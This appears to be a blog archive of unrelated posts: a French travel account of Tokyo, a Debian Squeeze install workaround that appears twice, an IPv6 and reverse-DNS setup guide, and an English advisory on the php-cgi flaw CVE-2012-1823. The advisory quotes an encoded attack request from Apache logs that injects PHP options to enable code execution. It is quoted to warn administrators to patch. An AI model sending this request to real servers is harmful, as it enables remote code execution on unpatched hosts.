Compte-rendu  sur mes impressions lors de mon premier voyage au Japon (Octobre 2013) et plus spécialement à Tokyo car je n’ai pas eu l’occasion d’en sortir. (C’est prévu pour d’autres voyages :))

Tout d’abord on commence par les photos, vous pouvez les voir sur mon profil Google Plus ou bien sur mon site (licence CC BY-SA 3.0 FR).
Ensuite les vidéos, sur Youtube ou sur mon site (catégorie Japan − licence CC-BY).

Les trucs cools

• Les distributeurs de boissons (et autres) : Y’en a partout et c’est pas chère !
• Les restaurants nombreux, très bon et à moins de 1000¥. Mon record est un curry à 500¥ (3.60€).
• Les restaurants avec des automates devant le bâtiment. Vous choisissez votre menu, vous payez, vous obtenez un ticket, vous aller vous installer et hop en moins de 5 minutes vous êtes servi !
• Les combini, magasins de proximité ouvert 24/24/7, où on trouve presque tout et à des prix très abordables (para-pluie (傘 kasa) à 400¥ (2.91€), panier repas (bento) à moins de 500¥, …).
• D’ailleurs globalement, les horaires d’ouvertures très larges des services et commerces. Coucou La Poste Française, au Japon c’est ouvert entre midi et deux et certaines postes sont ouvert jusqu’à très tard dans la nuit.
• Le métro et les trains, ultra propres, toujours à l’heure, et desservent très bien Tokyo.
• La propreté de la ville ! Bon forcément je compare avec des villes comme Paris ou Marseille, et ça fait tâche… Tokyo est vraiment très propre. Pourtant les poubelles sont rares, comme quoi c’est une question d’éducation…
• La monnaie et le fait que quasiment tout les automates prennent les billets (le plus petit billet est 1000¥, la plus grosse pièce 500¥), ce qui est très pratique.
• Les Japonais qui n’hésiteront pas à aider le gaijin ( 外人 − étranger) que vous êtes

Les trucs amusants

• Les « gros véhicules » comme les camions poubelles quand ils reculent font « tidu tidu, Attention, je recule ! ». Mais aussi pour les clignotants !
• Les Maid à Akihabara.
• Les salles d’arcades gigantesques.
• Les temples et vieux bâtiments au milieu d’une ville « high-tech ».
• Les parkings/garages automatisés, c’est génial, pourquoi on n’a pas ça en France, dans des villes comme Marseille où c’est une galère pour se garer ?

Les trucs moins cool

• Peu d’utilisation de la carte bleue. Au Japon la CB est apparemment très peu utilisée.
• Le packaging, moi qui déteste le sur-emballage, au Japon tout est sur-emballé !
• Je n’ai pas encore trouvé autre chose de gênant… Il faut que j’y retourne plusieurs fois pour me faire un avis

 

Bref, j’ai vraiment apprécié mon voyageà Tokyo, et je retourne au Japon dès que possible (à priori Avril 2014) !

Note : La conversion en Euros est réalisé avec le cours du Yen du 23/11/13.

Pour X raisons on peut encore avoir besoin d’installer du Debian Squeeze et non du Debian Wheezy… Malheureusement la console d’Online ne propose plus d’installer Debian 6. On installe donc une Debian 7 et on passe en mode iKVM…

J’ai demandé à l’équipe Online sur Twitter d’ajouter l’ISO de Debian 6.0.8 sur leur NAS-ILO qui permet de monter un cd virtuel sur la machine via une ISO, et d’installer le tout via iKVM. (Merci pour leur réactivité !)

Hop, on lance l’installateur Debian, mais au bout d’un moment celui-ci ne trouve plus le cd !

@Solvik Hum ça passe pas. Tu pourrais vérifier l'intégrité de l'ISO ? Ou j'ai pas de chance et je ré-essaye ? pic.twitter.com/QgkEQOAuAT

— Benoît.S (@benpro82) November 22, 2013

<script async src="//platform.twitter.com/widgets.js" charset="utf-8">

@Solvik pic.twitter.com/w9uIBudYDY

— Benoît.S (@benpro82) November 22, 2013

<script async src="//platform.twitter.com/widgets.js" charset="utf-8">

Bref après plusieurs galères, j’ai réussi à bidouiller et à installer Debian Squeeze ! L’astuce est de se servir d’une ISO business-card la moins dépendante au lecteur CD, puis de passer tout ce qui échoue, chargement de LVM pour la partitioneur (donc pas possible de faire du LVM via l’installeur) et de l’installation de Grub (modules du kernel sur le CD !).

Ensuite on reboot la machine en rescue, on chroot, on reconfigure linux-image (mkinitramfs), on installe grub, on reboot en mode normal, et voilà !

Pour X raisons on peut encore avoir besoin d’installer du Debian Squeeze et non du Debian Wheezy… Malheureusement la console d’Online ne propose plus d’installer Debian 6. On installe donc une Debian 7 et on passe en mode iKVM…

J’ai demandé à l’équipe Online sur Twitter d’ajouter l’ISO de Debian 6.0.8 sur leur NAS-ILO qui permet de monter un cd virtuel sur la machine via une ISO, et d’installer le tout via iKVM. (Merci pour leur réactivité !)

Hop, on lance l’installateur Debian, mais au bout d’un moment celui-ci ne trouve plus le cd !

@Solvik Hum ça passe pas. Tu pourrais vérifier l'intégrité de l'ISO ? Ou j'ai pas de chance et je ré-essaye ? pic.twitter.com/QgkEQOAuAT

— Benoît.S (@benpro82) November 22, 2013

<script async src="//platform.twitter.com/widgets.js" charset="utf-8">

@Solvik pic.twitter.com/w9uIBudYDY

— Benoît.S (@benpro82) November 22, 2013

<script async src="//platform.twitter.com/widgets.js" charset="utf-8">

Bref après plusieurs galères, j’ai réussi à bidouiller et à installer Debian Squeeze ! L’astuce est de se servir d’une ISO business-card la moins dépendante au lecteur CD, puis de passer tout ce qui échoue, chargement de LVM pour la partitioneur (donc pas possible de faire du LVM via l’installeur) et de l’installation de Grub (modules du kernel sur le CD !).

Ensuite on reboot la machine en rescue, on chroot, on reconfigure linux-image (mkinitramfs), on installe grub, on reboot en mode normal, et voilà !

Online change son adressage IPv6 et son fonctionnement. Voici un petit guide pour mettre en place l’IPv6 sur une machine Debian/Ubuntu avec délégation DNS pour la zone reverse.

Mise en place de l’IPv6

Première étape : Commander un bloc IPv6 commençant par 2001 dans la console Online.
Note : Si vous avez un bloc IPv6 qui commence par 2a01, il faut d’abord le résilier dans « Mon compte ». Puis commander un nouveau bloc IPv6.

Il y a un bloc IPv6 par client, mais il est possible de créer 1 sous-réseau par machine. L’idée est donc de créer un sous-réseau /56 par machine (ou plus selon vos besoins, par exemple des VM). Dans cet exemple, ça sera 2001:0bc8:dead:100::/56

Une fois que l’on obtient le bloc, il faut faire une requête DHCPv6 pour coller le préfixe à la machine.

Pour cela, créer /etc/dhcp/dhclient6.conf, puis y mettre le DUID fourni dans la console Online.

interface "eth0" {        
    send dhcp6.client-id DUID;
    request;
}

Dans /etc/network/interfaces, ajouter une adresse IPv6 (en respectant votre préfixe), le masque de sous-réseau et la requête DHCPv6 via la commande pre-up.

iface eth0 inet6 static
    address 2001:0bc8:dead:100::42
    netmask 56
    pre-up dhclient -cf /etc/dhcp/dhclient6.conf -6 -P eth0
    pre-down dhclient -x -pf /var/run/dhclient6.pid

Si vous avez un pare-feu iptables, il faudra autoriser le trafic DHCPv6.

/sbin/ip6tables -t filter -A INPUT -i eth0 -p udp --dport 546 -d fe80::/64 -j ACCEPT
/sbin/ip6tables -t filter -A OUTPUT -o eth0 -p udp --dport 547 -j ACCEPT

Au cas où, s’assurer qu’il n’y a pas d’autoconf sur l’interface eth0.

# sysctl -w net.ipv6.conf.eth0.autoconf=0
# echo "net.ipv6.conf.eth0.autoconf=0" >> /etc/sysctl.conf

Puis relancer le réseau.

# ifdown eth0 && ifup eth0

Mise en place de la délégation DNS

Online ne propose pas encore de personnaliser les reverse d’une adresse IPv6. Par contre, on peut déléguer la zone du bloc IPv6 /48 à d’autres serveurs DNS. On va donc s’en servir pour déléguer la zone sur nos serveurs DNS et attribuer un reverse à notre adresse IPv6 (dans cet exemple 2001:0bc8:dead:100::42).

Déclarez votre zone dans votre bind et créez le fichier de zone.

 zone "d.a.e.d.8.c.b.0.1.0.0.2.ip6.arpa" {
        type master;
        file "/etc/bind/db.ip6.2001_0bc8_dead";
};

 

;
; BIND reverse data file for reverse 2001:0bc8:dead::/48
;
@ IN SOA dns1.domain.fr. webmaster.domain.fr. (
2013112022 ; Serial
1h ; Refresh
30m ; Retry
1w ; Expire
1d ) ; Negative Cache TTL
;
@ NS dns1.domain.fr.
@ NS dns2.domain.fr.
2.4.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0 IN PTR machine.domain.fr.

Rechargez votre zone et voilà ! On pourra tester avec un dig -x 2001:0bc8:dead:100::42 @dns1.domain.fr

Si tout est OK, ajoutez vos serveurs DNS dans la console Online.

Sources :
Wiki Online
Wiki Evolix

There is a big security hole in PHP5.X (php-cgi) which could be made to execute arbitrary code with the privilege of the web server. There is an public exploit posted on 2013-10-29, and many bots uses it! Security hole was detected in September 2012 and so distributions have already patched php5-cgi package, but if you’re not up-to-date, you’re doomed!

More information :
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
https://security-tracker.debian.org/tracker/CVE-2012-1823
http://www.ubuntu.com/usn/usn-1437-1/

Typical forged request as seen in  Apache logs:

POST /%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E